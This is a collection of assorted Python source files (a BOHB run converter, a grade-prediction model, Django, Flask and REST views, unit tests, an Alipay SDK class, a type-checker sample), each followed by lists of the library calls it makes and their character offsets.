from deepcave.runs.run import Status
from deepcave.runs.converters.converter import Converter
from deepcave.runs.run import Run
from deepcave.runs.objective import Objective
from deepcave.utils.hash import file_to_hash
class BOHB(Converter):
@staticmethod
def name() -> str:
return "BOHB"
def get_run_id(self, working_dir, run_name) -> str:
"""
The id from the files in the current working_dir/run_name/*. For example, history.json could be read and hashed.
Idea behind: If id changed, then we have to update cached trials.
"""
# Use hash of history.json as id
return file_to_hash(os.path.join(working_dir, run_name, "results.json"))
def get_run(self, working_dir, run_name) -> Run:
"""
Based on working_dir/run_name/*, return a new trials object.
"""
base = os.path.join(working_dir, run_name)
# Read configspace
from ConfigSpace.read_and_write import json as cs_json
with open(os.path.join(base, 'configspace.json'), 'r') as f:
configspace = cs_json.read(f.read())
# Read objectives
# We have to define it ourselves, because we don't know the type of the objective
# Only lock lower
objective = Objective("Cost", lower=0)
run = Run(
configspace=configspace,
objectives=objective,
meta={}
)
from hpbandster.core.result import logged_results_to_HBS_result
bohb = logged_results_to_HBS_result(base)
first_starttime = None
for bohb_run in bohb.get_all_runs():
times = bohb_run.time_stamps
starttime = times["started"]
endtime = times["finished"]
if first_starttime is None:
first_starttime = starttime
starttime = starttime - first_starttime
endtime = endtime - first_starttime
cost = bohb_run.loss
budget = bohb_run.budget
config = bohb_run.info["config"]
# Convert str to dict
config = json.loads(config)
origin = None
additional = {}
status = bohb_run.info["state"]
# QUEUED, RUNNING, CRASHED, REVIEW, TERMINATED, COMPLETED, SUCCESS
if "SUCCESS" in status or "TERMINATED" in status or "COMPLETED" in status:
status = Status.SUCCESS
elif "RUNNING" in status or "QUEUED" in status or "REVIEW" in status:
status = Status.RUNNING
else:
status = Status.CRASHED
if status != Status.SUCCESS:
# We don't want cost included which are failed
cost = None
run.add(
costs=[cost], # Having only single objective here
config=config,
budget=budget,
start_time=starttime,
end_time=endtime,
status=status,
origin=origin,
additional=additional,
)
# Save for sanity check
# run.save(os.path.join(base, "run"))
return run
|
[
"deepcave.runs.objective.Objective",
"json.loads",
"deepcave.runs.run.Run",
"os.path.join",
"hpbandster.core.result.logged_results_to_HBS_result"
] |
[((978, 1013), 'os.path.join', 'os.path.join', (['working_dir', 'run_name'], {}), '(working_dir, run_name)\n', (990, 1013), False, 'import os\n'), ((1386, 1412), 'deepcave.runs.objective.Objective', 'Objective', (['"""Cost"""'], {'lower': '(0)'}), "('Cost', lower=0)\n", (1395, 1412), False, 'from deepcave.runs.objective import Objective\n'), ((1428, 1487), 'deepcave.runs.run.Run', 'Run', ([], {'configspace': 'configspace', 'objectives': 'objective', 'meta': '{}'}), '(configspace=configspace, objectives=objective, meta={})\n', (1431, 1487), False, 'from deepcave.runs.run import Run\n'), ((1622, 1656), 'hpbandster.core.result.logged_results_to_HBS_result', 'logged_results_to_HBS_result', (['base'], {}), '(base)\n', (1650, 1656), False, 'from hpbandster.core.result import logged_results_to_HBS_result\n'), ((762, 813), 'os.path.join', 'os.path.join', (['working_dir', 'run_name', '"""results.json"""'], {}), "(working_dir, run_name, 'results.json')\n", (774, 813), False, 'import os\n'), ((2214, 2232), 'json.loads', 'json.loads', (['config'], {}), '(config)\n', (2224, 2232), False, 'import json\n'), ((1123, 1161), 'os.path.join', 'os.path.join', (['base', '"""configspace.json"""'], {}), "(base, 'configspace.json')\n", (1135, 1161), False, 'import os\n')]
|
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from xgboost import XGBRegressor
import os
from django.conf import settings
import numpy as np
from functools import lru_cache
RANDOM_STATE = 42
def get_path(course, file):
return os.path.join(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit', course, file)
@lru_cache(maxsize=32)
def load_data(course):
# Loading the final grade and the student list
final_grades = pd.read_csv(get_path(course, 'final_grades.csv'), index_col='user_id')
course_feature = pd.read_csv(get_path(course, 'coursewised_feature.csv'),
index_col='user_id').fillna(0)
# cg = pd.read_csv(get_path(course, 'chapter_grades.csv'))
# cg = cg.pivot(index='user_id', columns='chapter_mid', values='chgrade').fillna(0)
cv = pd.read_csv(get_path(course, 'chapter_videos.csv'))
cv = cv.pivot(index='user_id', columns='chapter_name', values='video_count').fillna(0)
# note that the above dfs have same index 'user_id'
# # merge the course_videos and course_grades
# features = \
# cg.join(cv, on=None, how='outer', lsuffix='_grade', rsuffix='_video_count').fillna(0)
features = cv
# full outer join on cv.user_id = course_feature.user_id
features = features.join(course_feature, how='outer').fillna(0)
# final_grades is y-data => left outer join on final_grades.user_id = features.user_id
df = final_grades.join(features, how='left').fillna(0)
# exclude the 'final_grade' and 'nproblem_check'
X = df.drop(['final_grade', 'nproblem_check', 'username'], axis=1)
y = df['final_grade']
return X, y
def get_user_chapter_grades(course, user_id):
chapter_grade = pd.read_csv(get_path(course, 'chapter_grade.csv'), index_col=['user_id', 'chapter_id'])
result = []
for chapter_id, chapter_grade in chapter_grade.loc[user_id]['chapter_grade'].iteritems():
result.append({"name": "Chapter "+str(chapter_id), "score": chapter_grade})
return result
def main():
course = 'VJx__VJx_2__3T2016'
filename = 'model.xgb'
X, y = load_data(course)
# Normalization
scaler = MinMaxScaler()
scaler.fit(X)
X = scaler.transform(X)
model = XGBRegressor()
if os.path.isfile(filename):
model.load_model(filename)
else:
model.fit(X, y)
model.save_model(filename)
y_ = model.predict(X)
print(y_)
model_cache = {}
data_transformer = {}
def predict(course_code, user_id):
filename = get_path(course_code, '%s_model.xgb' % course_code)
X, y = load_data(course_code)
user_X = X.loc[user_id]
# Normalization
if course_code not in data_transformer:
scaler = MinMaxScaler()
scaler.fit(X)
data_transformer[course_code] = scaler
scaler = data_transformer[course_code]
if course_code not in model_cache:
model = XGBRegressor()
if os.path.isfile(filename):
model.load_model(filename)
else:
X = scaler.transform(X)
model.fit(X, y)
model.save_model(filename)
model_cache[course_code] = model
model = model_cache[course_code]
X = scaler.transform(X)
y_ = model.predict(X)
hist, bin_edges = np.histogram(y_, bins=10, range=[0, 1])
return {
"classFinalExamDistribution": hist.tolist(),
"myChapterScore": get_user_chapter_grades(course_code, user_id),
"myPredictedFinalExamScore": float(model.predict(user_X)[0])
}
if __name__ == '__main__':
main()
|
[
"sklearn.preprocessing.MinMaxScaler",
"os.path.isfile",
"numpy.histogram",
"xgboost.XGBRegressor",
"functools.lru_cache",
"os.path.join"
] |
[((344, 365), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(32)'}), '(maxsize=32)\n', (353, 365), False, 'from functools import lru_cache\n'), ((254, 344), 'os.path.join', 'os.path.join', (['settings.PROJECT_ROOT', '""".."""', '"""pandas_api"""', '"""static"""', '"""mit"""', 'course', 'file'], {}), "(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit',\n course, file)\n", (266, 344), False, 'import os\n'), ((2171, 2185), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2183, 2185), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2245, 2259), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2257, 2259), False, 'from xgboost import XGBRegressor\n'), ((2267, 2291), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2281, 2291), False, 'import os\n'), ((3275, 3314), 'numpy.histogram', 'np.histogram', (['y_'], {'bins': '(10)', 'range': '[0, 1]'}), '(y_, bins=10, range=[0, 1])\n', (3287, 3314), True, 'import numpy as np\n'), ((2728, 2742), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2740, 2742), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2911, 2925), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2923, 2925), False, 'from xgboost import XGBRegressor\n'), ((2937, 2961), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2951, 2961), False, 'import os\n')]
|
import json
pythonValueDic = {
'name': 'zhangsan',
'isCat': True,
'miceCaught': 0
}
data = json.dumps(pythonValueDic)
print(data)
"""
{"name": "zhangsan", "isCat": true, "miceCaught": 0}
"""
|
[
"json.dumps"
] |
[((105, 131), 'json.dumps', 'json.dumps', (['pythonValueDic'], {}), '(pythonValueDic)\n', (115, 131), False, 'import json\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
class ApInvoiceBillLinkOrderRequest(object):
def __init__(self):
self._amt = None
self._daily_bill_dimension = None
self._monthly_bill_no = None
@property
def amt(self):
return self._amt
@amt.setter
def amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._amt = value
else:
self._amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def daily_bill_dimension(self):
return self._daily_bill_dimension
@daily_bill_dimension.setter
def daily_bill_dimension(self, value):
self._daily_bill_dimension = value
@property
def monthly_bill_no(self):
return self._monthly_bill_no
@monthly_bill_no.setter
def monthly_bill_no(self, value):
self._monthly_bill_no = value
def to_alipay_dict(self):
params = dict()
if self.amt:
if hasattr(self.amt, 'to_alipay_dict'):
params['amt'] = self.amt.to_alipay_dict()
else:
params['amt'] = self.amt
if self.daily_bill_dimension:
if hasattr(self.daily_bill_dimension, 'to_alipay_dict'):
params['daily_bill_dimension'] = self.daily_bill_dimension.to_alipay_dict()
else:
params['daily_bill_dimension'] = self.daily_bill_dimension
if self.monthly_bill_no:
if hasattr(self.monthly_bill_no, 'to_alipay_dict'):
params['monthly_bill_no'] = self.monthly_bill_no.to_alipay_dict()
else:
params['monthly_bill_no'] = self.monthly_bill_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ApInvoiceBillLinkOrderRequest()
if 'amt' in d:
o.amt = d['amt']
if 'daily_bill_dimension' in d:
o.daily_bill_dimension = d['daily_bill_dimension']
if 'monthly_bill_no' in d:
o.monthly_bill_no = d['monthly_bill_no']
return o
|
[
"alipay.aop.api.domain.MultiCurrencyMoneyOpenApi.MultiCurrencyMoneyOpenApi.from_alipay_dict"
] |
[((601, 650), 'alipay.aop.api.domain.MultiCurrencyMoneyOpenApi.MultiCurrencyMoneyOpenApi.from_alipay_dict', 'MultiCurrencyMoneyOpenApi.from_alipay_dict', (['value'], {}), '(value)\n', (643, 650), False, 'from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi\n')]
|
# This sample tests the type checker's handling of ParamSpec
# and Concatenate as described in PEP 612.
from typing import Callable, Concatenate, ParamSpec, TypeVar
P = ParamSpec("P")
R = TypeVar("R")
class Request:
...
def with_request(f: Callable[Concatenate[Request, P], R]) -> Callable[P, R]:
def inner(*args: P.args, **kwargs: P.kwargs) -> R:
return f(Request(), *args, **kwargs)
return inner
@with_request
def takes_int_str(request: Request, x: int, y: str) -> int:
# use request
return x + 7
takes_int_str(1, "A")
# This should generate an error because the first arg
# is the incorrect type.
takes_int_str("B", "A")
# This should generate an error because there are too
# many parameters.
takes_int_str(1, "A", 2)
# This should generate an error because a ParamSpec can appear
# only within the last type arg for Concatenate
def decorator1(f: Callable[Concatenate[P, P], int]) -> Callable[P, int]:
...
# This should generate an error because the last type arg
# for Concatenate should be a ParamSpec.
def decorator2(f: Callable[Concatenate[int, int], int]) -> Callable[P, int]:
...
# This should generate an error because Concatenate is missing
# its type arguments.
def decorator3(f: Callable[Concatenate, int]) -> Callable[P, int]:
...
def decorator4(func: Callable[P, None]) -> Callable[Concatenate[int, P], None]:
def wrapper(x: int, /, *args: P.args, **kwargs: P.kwargs) -> None:
...
return wrapper
def func1(func: Callable[Concatenate[int, P], None]) -> Callable[P, None]:
...
def func2(a: int, b: str, c: str) -> None:
...
def func3(a: int, /, b: str, c: str) -> None:
...
def func4(a: int, b: str, /, c: str) -> None:
...
v1 = func1(func2)
reveal_type(v1, expected_text="(b: str, c: str) -> None")
v2 = func1(func3)
reveal_type(v2, expected_text="(b: str, c: str) -> None")
v3 = func1(func4)
reveal_type(v3, expected_text="(b: str, /, c: str) -> None")
def func5(__fn: Callable[P, R], *args: P.args, **kwargs: P.kwargs) -> R:
...
def func6(name: str, *args: str):
...
v5 = func5(func6, "a", "b", "c")
# This should generate an error because 1 isn't assignable to str.
v6 = func5(func6, "a", "b", "c", 1)
def func7(name: str, **kwargs: str):
...
v7 = func5(func7, "a", b="b", c="c")
# This should generate an error because 1 isn't assignable to str.
v8 = func5(func7, "a", b="b", c=1)
|
[
"typing.ParamSpec",
"typing.TypeVar"
] |
[((171, 185), 'typing.ParamSpec', 'ParamSpec', (['"""P"""'], {}), "('P')\n", (180, 185), False, 'from typing import Callable, Concatenate, ParamSpec, TypeVar\n'), ((190, 202), 'typing.TypeVar', 'TypeVar', (['"""R"""'], {}), "('R')\n", (197, 202), False, 'from typing import Callable, Concatenate, ParamSpec, TypeVar\n')]
|
import pkg_resources
import unittest
from grip.model import Dependency, Version, Package
class TestDependency(unittest.TestCase):
def test_ctor_str(self):
dep = Dependency('django==2.0')
self.assertEqual(dep.name, 'django')
self.assertTrue(dep.matches_version('2.0'))
self.assertFalse(dep.matches_version('2.1'))
def test_ctor_pkgr_req(self):
req = pkg_resources.Requirement('django==2.0')
dep = Dependency(req)
self.assertEqual(dep.name, 'django')
self.assertTrue(dep.matches_version('2.0'))
self.assertFalse(dep.matches_version('2.1'))
def test_ctor_err(self):
with self.assertRaises(TypeError):
Dependency(2)
def test_matching(self):
dep = Dependency('celery>=3,<5')
self.assertFalse(dep.matches_version('2.7'))
self.assertTrue(dep.matches_version(Version('3.0')))
self.assertTrue(dep.matches_version('3.2'))
self.assertFalse(dep.matches_version('5'))
def test_compare(self):
a = Dependency('celery>=3,<5')
b = Dependency('django==2')
self.assertGreater(b, a)
self.assertLess(a, b)
def test_exact(self):
a = Dependency('django==2')
b = Dependency.exact(Package('django' ,'2'))
self.assertEqual(a.name, b.name)
self.assertEqual(a.specifier, b.specifier)
def test_str(self):
dep = Dependency.exact(Package('django' ,'2'))
self.assertEqual(str(dep), 'django==2')
dep = Dependency('django==2')
dep.url = '[email protected]:a/b.git'
self.assertEqual(str(dep), dep.url + '#egg=django==2')
|
[
"grip.model.Version",
"grip.model.Package",
"grip.model.Dependency",
"pkg_resources.Requirement"
] |
[((175, 200), 'grip.model.Dependency', 'Dependency', (['"""django==2.0"""'], {}), "('django==2.0')\n", (185, 200), False, 'from grip.model import Dependency, Version, Package\n'), ((400, 440), 'pkg_resources.Requirement', 'pkg_resources.Requirement', (['"""django==2.0"""'], {}), "('django==2.0')\n", (425, 440), False, 'import pkg_resources\n'), ((455, 470), 'grip.model.Dependency', 'Dependency', (['req'], {}), '(req)\n', (465, 470), False, 'from grip.model import Dependency, Version, Package\n'), ((764, 790), 'grip.model.Dependency', 'Dependency', (['"""celery>=3,<5"""'], {}), "('celery>=3,<5')\n", (774, 790), False, 'from grip.model import Dependency, Version, Package\n'), ((1049, 1075), 'grip.model.Dependency', 'Dependency', (['"""celery>=3,<5"""'], {}), "('celery>=3,<5')\n", (1059, 1075), False, 'from grip.model import Dependency, Version, Package\n'), ((1088, 1111), 'grip.model.Dependency', 'Dependency', (['"""django==2"""'], {}), "('django==2')\n", (1098, 1111), False, 'from grip.model import Dependency, Version, Package\n'), ((1214, 1237), 'grip.model.Dependency', 'Dependency', (['"""django==2"""'], {}), "('django==2')\n", (1224, 1237), False, 'from grip.model import Dependency, Version, Package\n'), ((1525, 1548), 'grip.model.Dependency', 'Dependency', (['"""django==2"""'], {}), "('django==2')\n", (1535, 1548), False, 'from grip.model import Dependency, Version, Package\n'), ((706, 719), 'grip.model.Dependency', 'Dependency', (['(2)'], {}), '(2)\n', (716, 719), False, 'from grip.model import Dependency, Version, Package\n'), ((1267, 1289), 'grip.model.Package', 'Package', (['"""django"""', '"""2"""'], {}), "('django', '2')\n", (1274, 1289), False, 'from grip.model import Dependency, Version, Package\n'), ((1439, 1461), 'grip.model.Package', 'Package', (['"""django"""', '"""2"""'], {}), "('django', '2')\n", (1446, 1461), False, 'from grip.model import Dependency, Version, Package\n'), ((888, 902), 'grip.model.Version', 'Version', (['"""3.0"""'], {}), "('3.0')\n", (895, 902), False, 'from grip.model import Dependency, Version, Package\n')]
|
from flask import Blueprint, Response, request, jsonify
from sqlalchemy import func
from application.database import global_db
from application.helpers import crossdomain, gen_csv_response
from core.monitoring.models import SENSOR_CLASS_MAP
sensor_stat_api_pages = Blueprint('sensor_stat_api', __name__
, template_folder='templates', static_folder='static')
@sensor_stat_api_pages.route("/avg/<string:sensor>")
@crossdomain(origin='*')
def get_sensor_stat(sensor: str) -> Response:
try:
t_from = request.args["t_from"]
t_to = request.args["t_to"]
sensor_class = SENSOR_CLASS_MAP[sensor]
except KeyError as e:
raise e
query = (global_db.session.query(
sensor_class.time
, func.count(sensor_class.time).label("working_nodes")
, func.avg(sensor_class.avg).label("avg"))
.filter(sensor_class.time > t_from)
.filter(sensor_class.time < t_to)
.group_by(sensor_class.time)
.order_by(sensor_class.time))
return gen_csv_response(query.column_descriptions, query.all())
|
[
"sqlalchemy.func.avg",
"flask.Blueprint",
"sqlalchemy.func.count",
"application.helpers.crossdomain"
] |
[((267, 362), 'flask.Blueprint', 'Blueprint', (['"""sensor_stat_api"""', '__name__'], {'template_folder': '"""templates"""', 'static_folder': '"""static"""'}), "('sensor_stat_api', __name__, template_folder='templates',\n static_folder='static')\n", (276, 362), False, 'from flask import Blueprint, Response, request, jsonify\n'), ((416, 439), 'application.helpers.crossdomain', 'crossdomain', ([], {'origin': '"""*"""'}), "(origin='*')\n", (427, 439), False, 'from application.helpers import crossdomain, gen_csv_response\n'), ((695, 724), 'sqlalchemy.func.count', 'func.count', (['sensor_class.time'], {}), '(sensor_class.time)\n', (705, 724), False, 'from sqlalchemy import func\n'), ((753, 779), 'sqlalchemy.func.avg', 'func.avg', (['sensor_class.avg'], {}), '(sensor_class.avg)\n', (761, 779), False, 'from sqlalchemy import func\n')]
|
"""docstring for pollsapp tests."""
import datetime
from django.test import TestCase, Client
from django.utils import timezone
from django.urls import reverse
from .models import Question
client = Client()
def create_question(question_text, days):
"""Create a question and add no. of days to now."""
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionModelTests(TestCase):
"""docstring for QuestionModelTests."""
def test_was_published_recently_with_future_question(self):
"""Should return false."""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""Func returns False for questions whose pub-date is older than 1 day."""
time = timezone.now() - datetime.timedelta(days=1, seconds=1)
old_question = Question(pub_date=time)
self.assertIs(old_question.was_published_recently(), False)
def test_was_published_recently_with_recent_question(self):
"""Func returns True for questions whose pub-date is within the last day."""
time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
recent_question = Question(pub_date=time)
self.assertIs(recent_question.was_published_recently(), True)
class QuestionIndexViewTests(TestCase):
"""docstring for QuestionIndexViewTests."""
def test_no_questions(self):
"""Display appropriate msg if no questions exist."""
response = self.client.get(reverse('pollsapp:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are available")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_past_question(self):
"""Display questions with a pub_date in the past on the index page."""
create_question(question_text="Past question.", days=-30)
response = self.client.get(reverse('pollsapp:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_future_question(self):
"""Don't display questions with a pub_date in the future on the index page."""
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('pollsapp:index'))
self.assertContains(response, "No polls are available")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_future_question_and_past_question(self):
"""Display past questions even if both past and future questions exist."""
create_question(question_text="Past question.", days=-30)
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('pollsapp:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
"""The questions index page may display multiple questions."""
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('pollsapp:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question 2.>', '<Question: Past question 1.>']
)
class QuestionDetailViewTests(object):
"""docstring for QuestionDetailViewTests."""
def test_future_question(self):
"""Return 404 if pub-date is in the future."""
future_question = create_question(
question_text='Future question.', days=30)
url = reverse("pollsapp:detail", args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""Question text should be displayed."""
past_question = create_question(question_text='Past question', days=-5)
url = reverse("pollsapp:detail", args=(past_question.id))
response = self.client.get(url)
self.assertContains(response, past_question.question_text)
|
[
"django.utils.timezone.now",
"django.urls.reverse",
"datetime.timedelta",
"django.test.Client"
] |
[((198, 206), 'django.test.Client', 'Client', ([], {}), '()\n', (204, 206), False, 'from django.test import TestCase, Client\n'), ((318, 332), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (330, 332), False, 'from django.utils import timezone\n'), ((335, 364), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': 'days'}), '(days=days)\n', (353, 364), False, 'import datetime\n'), ((3965, 4019), 'django.urls.reverse', 'reverse', (['"""pollsapp:detail"""'], {'args': '(future_question.id,)'}), "('pollsapp:detail', args=(future_question.id,))\n", (3972, 4019), False, 'from django.urls import reverse\n'), ((4290, 4339), 'django.urls.reverse', 'reverse', (['"""pollsapp:detail"""'], {'args': 'past_question.id'}), "('pollsapp:detail', args=past_question.id)\n", (4297, 4339), False, 'from django.urls import reverse\n'), ((641, 655), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (653, 655), False, 'from django.utils import timezone\n'), ((658, 685), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(30)'}), '(days=30)\n', (676, 685), False, 'import datetime\n'), ((967, 981), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (979, 981), False, 'from django.utils import timezone\n'), ((984, 1021), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)', 'seconds': '(1)'}), '(days=1, seconds=1)\n', (1002, 1021), False, 'import datetime\n'), ((1302, 1316), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1314, 1316), False, 'from django.utils import timezone\n'), ((1319, 1371), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(23)', 'minutes': '(59)', 'seconds': '(59)'}), '(hours=23, minutes=59, seconds=59)\n', (1337, 1371), False, 'import datetime\n'), ((1712, 1737), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (1719, 1737), False, 'from django.urls import reverse\n'), ((2149, 2174), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (2156, 2174), False, 'from django.urls import reverse\n'), ((2543, 2568), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (2550, 2568), False, 'from django.urls import reverse\n'), ((3019, 3044), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (3026, 3044), False, 'from django.urls import reverse\n'), ((3469, 3494), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (3476, 3494), False, 'from django.urls import reverse\n')]
|
import json
from django.forms import model_to_dict
from rest_framework import views
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from attendance.models import Attendance
from attendance.models import Event
from attendance.permissions import IsAttendanceAdmin
from attendance.permissions import IsAttendanceAdminOrReadOnly
from authentication.models import Account
from authentication.permissions import IsAccountAdminOrAccountOwner
from members.models import Band
from members.models import BandMember
from members.serializers import BandMemberSerializer
from members.serializers import BandSerializer
class BandViewSet(viewsets.ModelViewSet):
queryset = Band.objects.all()
serializer_class = BandSerializer
permission_classes = (IsAuthenticated, IsAttendanceAdminOrReadOnly,)
class BandAssignmentView(views.APIView):
permission_classes = (IsAuthenticated, IsAttendanceAdminOrReadOnly,)
def get(self, request, format=None):
band_assignments = {}
for band in Band.objects.all():
member_assignments = {}
member_assignments["assigned"] = []
member_assignments["unassigned"] = []
for assigned_member in band.assigned_members.all():
member_assignment = {
"id": assigned_member.id,
"name": assigned_member.full_name,
"section": assigned_member.section_display
}
member_assignments["assigned"].append(member_assignment)
for unassigned_member in band.unassigned_members.all():
member_assignment = {
"id": unassigned_member.id,
"name": unassigned_member.full_name,
"section": unassigned_member.section_display
}
member_assignments["unassigned"].append(member_assignment)
band_assignments[band.id] = member_assignments
return Response(band_assignments)
def post(self, request, format=None):
data = json.loads(request.body)
member_id = data.get('member', None)
band_id = data.get('band', None)
action = data.get('action', None)
if member_id and band_id and action:
band_member = BandMember.objects.get(id=member_id)
band = Band.objects.get(id=band_id)
if action == 'assign':
band.unassigned_members.remove(band_member)
band.assigned_members.add(band_member)
for event in band.events.all():
try:
attendance = Attendance.objects.get(event=event, member=band_member)
if attendance.points is None:
is_modified = False
if not attendance.assigned:
attendance.assigned = True
is_modified = True
if not attendance.is_active:
attendance.is_active = True
is_modified = True
if is_modified:
attendance.save()
except Attendance.DoesNotExist:
Attendance.objects.create(event=event, member=band_member, assigned=True)
elif action == 'unassign':
band.unassigned_members.add(band_member)
band.assigned_members.remove(band_member)
for event in band.events.all():
try:
attendance = Attendance.objects.get(
event=event,
member=band_member,
points__isnull=True,
assigned=True)
attendance.assigned = False
attendance.is_active = False
attendance.save()
except Attendance.DoesNotExist:
pass
band.save()
return Response()
else:
return Response({
'status': 'Bad request',
'message': 'Missing parameter in request',
}, status=status.HTTP_400_BAD_REQUEST)
class BandMemberViewSet(viewsets.ModelViewSet):
queryset = BandMember.objects.all()
serializer_class = BandMemberSerializer
permission_classes = (IsAuthenticated, IsAccountAdminOrAccountOwner,)
class UnassignedMembersView(views.APIView):
permission_classes = (IsAuthenticated, IsAttendanceAdmin,)
def get(self, request, format=None):
event_id = self.request.query_params.get('event_id', None)
if event_id:
try:
event = Event.objects.get(id=event_id)
except Event.DoesNotExist:
return Response({
'status': 'Bad request',
'message': 'Could not find event from event_id',
}, status=status.HTTP_400_BAD_REQUEST)
existing_unassigned_members = Attendance.objects.filter(
event=event,
assigned=False,
is_active=True,
).values_list('member_id', flat=True).distinct()
band = event.band
if band:
unassigned_members_queryset = band.unassigned_members
else:
unassigned_members_queryset = BandMember.objects.filter(account__is_active=True)
unassigned_members = unassigned_members_queryset.exclude(
id__in=existing_unassigned_members).all()
unassigned_members_dicts = []
for unassigned_member in unassigned_members:
full_name = unassigned_member.full_name
member_dict = model_to_dict(unassigned_member)
member_dict['full_name'] = full_name
unassigned_members_dicts.append(member_dict)
return Response(unassigned_members_dicts)
return Response({
'status': 'Bad request',
'message': 'No event_id in request',
}, status=status.HTTP_400_BAD_REQUEST)
|
[
"json.loads",
"members.models.Band.objects.get",
"attendance.models.Attendance.objects.filter",
"members.models.BandMember.objects.get",
"attendance.models.Attendance.objects.create",
"rest_framework.response.Response",
"members.models.Band.objects.all",
"attendance.models.Event.objects.get",
"members.models.BandMember.objects.all",
"django.forms.model_to_dict",
"attendance.models.Attendance.objects.get",
"members.models.BandMember.objects.filter"
] |
[((754, 772), 'members.models.Band.objects.all', 'Band.objects.all', ([], {}), '()\n', (770, 772), False, 'from members.models import Band\n'), ((4454, 4478), 'members.models.BandMember.objects.all', 'BandMember.objects.all', ([], {}), '()\n', (4476, 4478), False, 'from members.models import BandMember\n'), ((1092, 1110), 'members.models.Band.objects.all', 'Band.objects.all', ([], {}), '()\n', (1108, 1110), False, 'from members.models import Band\n'), ((2049, 2075), 'rest_framework.response.Response', 'Response', (['band_assignments'], {}), '(band_assignments)\n', (2057, 2075), False, 'from rest_framework.response import Response\n'), ((2135, 2159), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (2145, 2159), False, 'import json\n'), ((6142, 6254), 'rest_framework.response.Response', 'Response', (["{'status': 'Bad request', 'message': 'No event_id in request'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'status': 'Bad request', 'message': 'No event_id in request'},\n status=status.HTTP_400_BAD_REQUEST)\n", (6150, 6254), False, 'from rest_framework.response import Response\n'), ((2359, 2395), 'members.models.BandMember.objects.get', 'BandMember.objects.get', ([], {'id': 'member_id'}), '(id=member_id)\n', (2381, 2395), False, 'from members.models import BandMember\n'), ((2415, 2443), 'members.models.Band.objects.get', 'Band.objects.get', ([], {'id': 'band_id'}), '(id=band_id)\n', (2431, 2443), False, 'from members.models import Band\n'), ((4183, 4193), 'rest_framework.response.Response', 'Response', ([], {}), '()\n', (4191, 4193), False, 'from rest_framework.response import Response\n'), ((4227, 4345), 'rest_framework.response.Response', 'Response', (["{'status': 'Bad request', 'message': 'Missing parameter in request'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'status': 'Bad request', 'message':\n 'Missing parameter in request'}, status=status.HTTP_400_BAD_REQUEST)\n", (4235, 4345), False, 'from rest_framework.response import Response\n'), ((6091, 6125), 'rest_framework.response.Response', 'Response', (['unassigned_members_dicts'], {}), '(unassigned_members_dicts)\n', (6099, 6125), False, 'from rest_framework.response import Response\n'), ((4877, 4907), 'attendance.models.Event.objects.get', 'Event.objects.get', ([], {'id': 'event_id'}), '(id=event_id)\n', (4894, 4907), False, 'from attendance.models import Event\n'), ((5559, 5609), 'members.models.BandMember.objects.filter', 'BandMember.objects.filter', ([], {'account__is_active': '(True)'}), '(account__is_active=True)\n', (5584, 5609), False, 'from members.models import BandMember\n'), ((5924, 5956), 'django.forms.model_to_dict', 'model_to_dict', (['unassigned_member'], {}), '(unassigned_member)\n', (5937, 5956), False, 'from django.forms import model_to_dict\n'), 